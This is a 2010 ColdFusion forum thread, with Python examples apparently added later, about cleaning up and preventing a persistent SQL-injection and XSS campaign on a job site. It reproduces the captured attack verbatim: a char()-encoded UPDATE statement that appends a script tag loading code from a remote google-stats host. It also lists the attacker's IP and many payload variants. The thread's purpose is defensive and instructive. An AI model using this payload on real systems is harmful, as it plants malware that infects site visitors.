October 5, 2010

Regular Expression Help


My site is obviously CF and I'm using SQL Server 2005 for my database, and I have been getting hacked for a couple of days now.

XSS or SQL injections, and I can't seem to stop it.

I've added portcullis.cfc, which is supposed to stop XSS and SQL injections, but it didn't help; I get an email from Portcullis stating a user was blocked, but the DB is still modified.

I changed all cfquerys to stored procedures, which I was under the impression would help, but nothing; still hacked this morning.

I've updated the server to the latest patches to no avail.

So my last line of defense is "Regular Expressions"; the reason it's my last is I have no clue how to write one.

The offending script that's getting injected is "< / t i t l e > < s c r i p t s r c = h t t p : / / g o o g l e - s t a t s 4 9 . i n f o / u r . p h p > </ s c r i p t>"

Now where you see stats49, sometimes it is stat49 and other times the 49 is a completely different number.

Also, there are no spaces in the script, but I added them for this purpose so as not to inadvertently run the script from this forum.

I would appreciate any help I can get in converting this to a regular expression so I can filter my input.

Regards

Craig Wiseman

    Correct answer ilssac

    I would like to know how to write the regex to check for just <script>, then remove that entire line, including the <title> tag.


    <script[^>]*>[^<]*</script>

    That should find any <script...>...</script> block.

    It says find that string "<script"

    plus zero or more characters that are not a closing angle bracket [^>]*

    plus zero or more characters that are not an opening angle bracket [^<]*

    plus the string </script>


    October 5, 2010

    Oh, I wrote a database scrubber, and I think this is somewhat the form of a RegEx:

    " <cfset tmpVar = REReplace(jobDescription, "</title><script src=htt p://google-stats50.info/ur.php></script>", "", "ALL") />
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://goo gle-s tat50.i nfo/ur.php></s cript>", "", "ALL") />
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats49.info/ur.php></script>", "", "ALL") />
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats48.info/ur.php></script>", "", "ALL") />
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats47.info/ur.php></script>", "", "ALL") />  
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats45.info/ur.php></script>", "", "ALL") />
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats44.info/ur.php></script>", "", "ALL") />  
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats43.info/ur.php></script>", "", "ALL") />
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats46.info/ur.php></script>", "", "ALL") /> 
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats53.info/ur.php></script>", "", "ALL") /> 
      <cfset tmpVar = REReplace(tmpVar, "</title><script src=htt p://google-stats54.info/ur.php></script>", "", "ALL") /> "

    But as you see, the attack changes every day. I need something to scrub and validate the data before it hits the DB; getting it out afterwards works, albeit I have to add in a new line just about every day when the number changes.

    ilssac
    October 5, 2010

    "</title><script src=http://google-stats.*?.info/ur.php></script>"


    Should allow you to catch any number, but this is still a very specific filter that will only catch this one attack of the millions of possible variations.
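
    To see how the two regexes in this exchange behave, here is an added example in Python (not ColdFusion, and not code from the thread). It applies ilssac's generic `<script[^>]*>[^<]*</script>` pattern and a generalised form of the campaign-specific pattern that accepts `google-stat` or `google-stats` followed by any digits, with the dots escaped so they match literally; the sample column values are constructed. One caveat it demonstrates: `[^<]*` cannot match a script body that itself contains `<`, and ColdFusion's `REReplace` is case-sensitive (use `REReplaceNoCase` for what `re.IGNORECASE` does here).

```python
import re

# ilssac's generic pattern: any <script ...>...</script> whose body contains no '<'.
# ColdFusion's REReplace is case-sensitive; REReplaceNoCase does what IGNORECASE does here.
SCRIPT_BLOCK = re.compile(r"<script[^>]*>[^<]*</script>", re.IGNORECASE)

# Same idea, but the body may contain '<' (a comparison inside inline JS, nested tags).
SCRIPT_BLOCK_ANY_BODY = re.compile(r"<script[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)

# The campaign pattern generalised: google-stat or google-stats, any digits, literal dots.
CAMPAIGN = re.compile(
    r"</title><script src=http://google-stats?\d+\.info/ur\.php></script>",
    re.IGNORECASE,
)


def scrub_campaign(value):
    """Remove every copy of this campaign's payload. Returns (cleaned, copies removed)."""
    return CAMPAIGN.subn("", value)


def strip_script_blocks(value, any_body=False):
    """Remove <script>...</script> blocks with ilssac's pattern, or with the
    DOTALL variant when any_body=True."""
    pattern = SCRIPT_BLOCK_ANY_BODY if any_body else SCRIPT_BLOCK
    return pattern.sub("", value)


# Constructed column values: what jobDescription might hold after several
# successful injections, plus a value that only looks related.
SAMPLES = [
    "Sales rep wanted</title><script src=http://google-stats49.info/ur.php></script>",
    "Warehouse lead</title><script src=http://google-stat50.info/ur.php></script>"
    "</title><script src=http://google-stats55.info/ur.php></script>",
    "Upload ur.php to the stats folder",  # mentions the words, carries no payload
]


def scrub_all(values):
    """Scrub a list of column values; returns (cleaned values, total copies removed)."""
    cleaned, total = [], 0
    for value in values:
        new_value, hits = scrub_campaign(value)
        cleaned.append(new_value)
        total += hits
    return cleaned, total


if __name__ == "__main__":
    cleaned, total = scrub_all(SAMPLES)
    for before, after in zip(SAMPLES, cleaned):
        print(repr(before), "->", repr(after))
    print("payload copies removed:", total)
    # Where the generic pattern stops: a script body containing '<'.
    inline = "<script>if(a<b){x()}</script>"
    print("generic :", repr(strip_script_blocks(inline)))
    print("any_body:", repr(strip_script_blocks(inline, any_body=True)))
```

    The `subn` count is worth logging when scrubbing a table: it tells you how many rows were hit per run, which is the number that should drop to zero once the query side is fixed.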

    October 6, 2010

    These scripts generally do the same thing - they have a Base64 or ASCII encoded string which loops through every column in every table in your database and appends some javascript to it, so anywhere you display code from a database the JS will execute. If you post up the entire string we can probably tell you more but believe me when I say - you're wasting your time here.

    I work for a hosting company and *every* time someone gets hacked by SQL Injection it's for the same reason - it's through their own fault. If you leave your car unlocked, you can't really blame some skank for nicking your iPod off the front seat. If you don't secure your website properly it'll get hacked, and it's *your* responsibility to fix any security holes as soon as you know about them. None of this "can you restore my site from backup please" then the next day "oh, I've been hacked again, can you restore the site again?". Believe me, it'll happen for the rest of time until you put a proper secure solution in place to stop it - until then unfortunately you're responsible for every person who gets malware on their machine or gets their details phished.

    People who "won't invest the money" are the bane of our lives, and more often than not we simply shut their site down, whether that puts them out of business or not. It's irresponsible and it's on a par with people who set their email password to "password" then come crying to us when none of their customers are getting their emails as the account has been used to send spam and they've got the mailserver blacklisted.

    Believe me, I understand it's not your fault and it's not your money, but what's wrong with this sentence: "I've been dealing with this attack for several weeks now. I'm doing work for a client that does not want to invest in the time/money required". Weeks? You could *easily* have been through setting them all to queryparams by now, and you'd at least have gotten some way to stopping it. Hackers will not get bored; it'll just get worse as word gets around that you have an insecure site.

    Sorry for the rant, but as long as people in the world are complaining about spam, viruses and phishing attacks I'll be complaining about people with insecure web forms.

    O.


    O-

    I understand everything that you are saying and have no argument for it.

    I just want to clarify, though, that I have not been working on it non-stop for a couple of weeks. I have several clients, and this one has had the issue pop up several times over the past couple of weeks. He has me spend 1 hour repairing data, and I put a check in my Application.cfm that loops through all the URL and form variables and, if it finds any malicious-looking input, ends their visit to the site.

    There was an attack last night and another this morning and I looked and the data seems to be preserved at this point.

    If you'd really like to see the entire string, here it is:

    421 update jobSearchStats set userName=cast(userName as varchar(8000))+cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+
    char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(103)
    +char(111)+char(111)+char(103)+char(108)+char(101)+char(45)+char(115)+char(116)+char(97)+char(116)+char(115)+char(53)+char(53)+char(46)+char(105)
    +char(110)+char(102)+char(111)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)
    +char(114)+char(105)+char(112)+char(116)+char(62) as varchar(8000))--

    I know what it is doing. It is trying to append the malicious script to a column in each table of the DB.

    The attack is originating from 77.78.239.63; the SysAdmin supposedly blocked all IPs originating from 77.78.239.*, but I still see the attacks coming in.

    J
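
    The `char()` chain is just a way of writing a string without quote characters, so a request filter can decode it and look at what it builds. The following is an added Python example, not the Application.cfm check from the thread, that decodes the payload J posted (line breaks removed, spacing normalised) and flags the markers this family of injection carries; the `suspicious_markers` function and its thresholds are assumptions, and the benign inputs are constructed. Note the last constructed case: a plain `--` in a job title trips the filter, which is why the thread's advice to parameterise rather than filter holds.

```python
import re

# One char(N) call; the \b stops "varchar(8000)" from matching. SQL Server's char() takes 0-255.
CHAR_CALL = re.compile(r"\bchar\((\d{1,3})\)", re.IGNORECASE)
# A maximal run of char(N) calls joined with '+'.
CHAR_CHAIN = re.compile(r"\bchar\(\d{1,3}\)(?:\s*\+\s*char\(\d{1,3}\))*", re.IGNORECASE)

# The request value J posted, line breaks removed (it arrived as one parameter value).
ATTACK = (
    "421 update jobSearchStats set userName=cast(userName as varchar(8000))+cast("
    "char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+"
    "char(60)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(32)+"
    "char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+"
    "char(58)+char(47)+char(47)+char(103)+char(111)+char(111)+char(103)+char(108)+"
    "char(101)+char(45)+char(115)+char(116)+char(97)+char(116)+char(115)+char(53)+"
    "char(53)+char(46)+char(105)+char(110)+char(102)+char(111)+char(47)+char(117)+"
    "char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+"
    "char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(62) as varchar(8000))--"
)


def decode_char_chains(sql):
    """Replace every char(N)+char(N)+... run with the string it builds, so the
    statement reads the way it will execute on the database."""
    def build(match):
        return "".join(chr(int(n)) for n in CHAR_CALL.findall(match.group(0)))
    return CHAR_CHAIN.sub(build, sql)


def suspicious_markers(value):
    """Reasons a request parameter looks like this family of injection; an empty
    list means nothing was found. Hypothetical check, not the thread's code."""
    reasons = []
    if len(CHAR_CALL.findall(value)) >= 4:
        reasons.append("char() chain building a string")
    if re.search(r"\bcast\s*\(.*?\bvarchar\s*\(\s*8000\s*\)", value, re.IGNORECASE | re.DOTALL):
        reasons.append("cast(... as varchar(8000)) concatenation")
    if re.search(r"^\s*\d+\s+(update|insert|delete|declare|exec|drop)\b", value, re.IGNORECASE):
        reasons.append("statement stacked after a numeric value")
    if "--" in value:
        reasons.append("SQL comment terminator")
    if re.search(r"<script\b", decode_char_chains(value), re.IGNORECASE):
        reasons.append("<script> tag once char() calls are decoded")
    return reasons


if __name__ == "__main__":
    print(decode_char_chains(ATTACK))
    # Constructed request values: the attack, two benign ones, and a benign one the filter trips on.
    for value in (ATTACK, "421", "O'Brien & Sons", "Sales -- remote ok"):
        print(repr(value[:40]), "->", suspicious_markers(value))
```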

    ilssac
    October 5, 2010

    First of all is it XSS or SQL INJECTION?

    Those are two completely different attack vectors, and each takes a different approach.

    For the latter,

    1. Make sure all your queries are using <cfqueryparam...> (with caveats).
    2. Limit the database user account used by your ColdFusion code to the minimum permissions required to work.
    3. Make sure there isn't any old code hanging around your server that users may be accessing.

    For the former

    1. Users are using your forms to input information. Sanitize ALL inputs from clients: form, URL, cookie, etc. They all can be manipulated by hackers.
    2. Store AND|OR display all output from the database with htmlEdit() or htmlCode() or similar functions that will escape all output, rendering XSS code inoperable, though visible.
    3. Consider the XSS protection settings available in the ColdFusion administrator.
    4. Run careful regex filters to clean up the database and/or inspect new inputs. Just be aware that this is an arms race against hackers that few developers have the time, knowledge and/or skills to keep up with. For every countermeasure filter created today, a clever hacker will figure a way around it tomorrow.
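
    Item 1 for SQL injection (parameterised queries) and item 2 for XSS (escape on output) can be shown side by side. The following is an added Python example using SQLite, not ColdFusion code from the thread; the table, row and `PAYLOAD` are constructed, and the payload is adapted to SQLite syntax (`;` between statements, `||` for concatenation) where SQL Server 2005 accepted bare whitespace and `+`. Binding the value as a parameter is what `<cfqueryparam>` does; `html.escape` plays the role of `HTMLEditFormat()`.

```python
import html
import sqlite3

# Constructed stand-in for the thread's payload, adapted to SQLite: ';' between
# statements and '||' for string concatenation, where SQL Server 2005 accepted
# bare whitespace and '+'. The appended script is the one from the thread.
PAYLOAD = ("421; update jobSearchStats set userName = userName || "
           "'</title><script src=http://google-stats55.info/ur.php></script>' --")


def fresh_db():
    """In-memory table shaped like the one the attack targeted, with one constructed row."""
    db = sqlite3.connect(":memory:")
    db.execute("create table jobSearchStats (id integer primary key, userName text)")
    db.execute("insert into jobSearchStats values (421, 'craig')")
    db.commit()
    return db


def lookup_concatenated(db, raw_id):
    """Vulnerable form: the request value is pasted into the SQL text, the
    equivalent of  where id = #url.id#  inside <cfquery>. executescript stands in
    for the SQL Server batch that ran every statement the attacker smuggled in.
    Returns the userName the row holds afterwards."""
    db.executescript("select userName from jobSearchStats where id = " + raw_id)
    return db.execute("select userName from jobSearchStats where id = 421").fetchone()[0]


def lookup_parameterized(db, raw_id):
    """Safe form: the value is bound as a parameter (cfqueryparam's job), so it can
    only ever be compared with id; it is never parsed as SQL."""
    row = db.execute("select userName from jobSearchStats where id = ?", (raw_id,)).fetchone()
    return row[0] if row else None


def render_cell(user_name):
    """Output escaping, the job HTMLEditFormat() does in CF: whatever reached the
    column is shown as text, so a payload that did get stored cannot run."""
    return "<td>%s</td>" % html.escape(user_name, quote=True)


if __name__ == "__main__":
    db = fresh_db()
    print("concatenated, benign :", lookup_concatenated(db, "421"))
    print("concatenated, payload:", lookup_concatenated(db, PAYLOAD))   # row now carries the script
    print("escaped on output    :", render_cell(lookup_concatenated(db, PAYLOAD)))
    db = fresh_db()
    print("parameterized, payload:", lookup_parameterized(db, PAYLOAD))  # None: no row has that id
    print("parameterized, benign :", lookup_parameterized(db, "421"))    # row untouched
```

    The two calls with `PAYLOAD` are the whole argument: with concatenation the column is modified and the application has to clean up afterwards; with a bound parameter the attacker's text is simply a value that matches nothing, and the escaping step covers any rows that were poisoned before the fix.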
    October 5, 2010

    Thanks for the reply, ilssac.

    That's what I'm trying to do regarding the RegEx; I just don't know how to write it. I've been googling it for 3 days and I still can't get one to work.

    ilssac
    October 5, 2010

    BrantNews wrote:

    Thats what im trying to do regarding the RegEx,

    Well, what are you actually trying to match? What have you tried to do? I.e., what are your requirements? What are your issues? And what have you tried?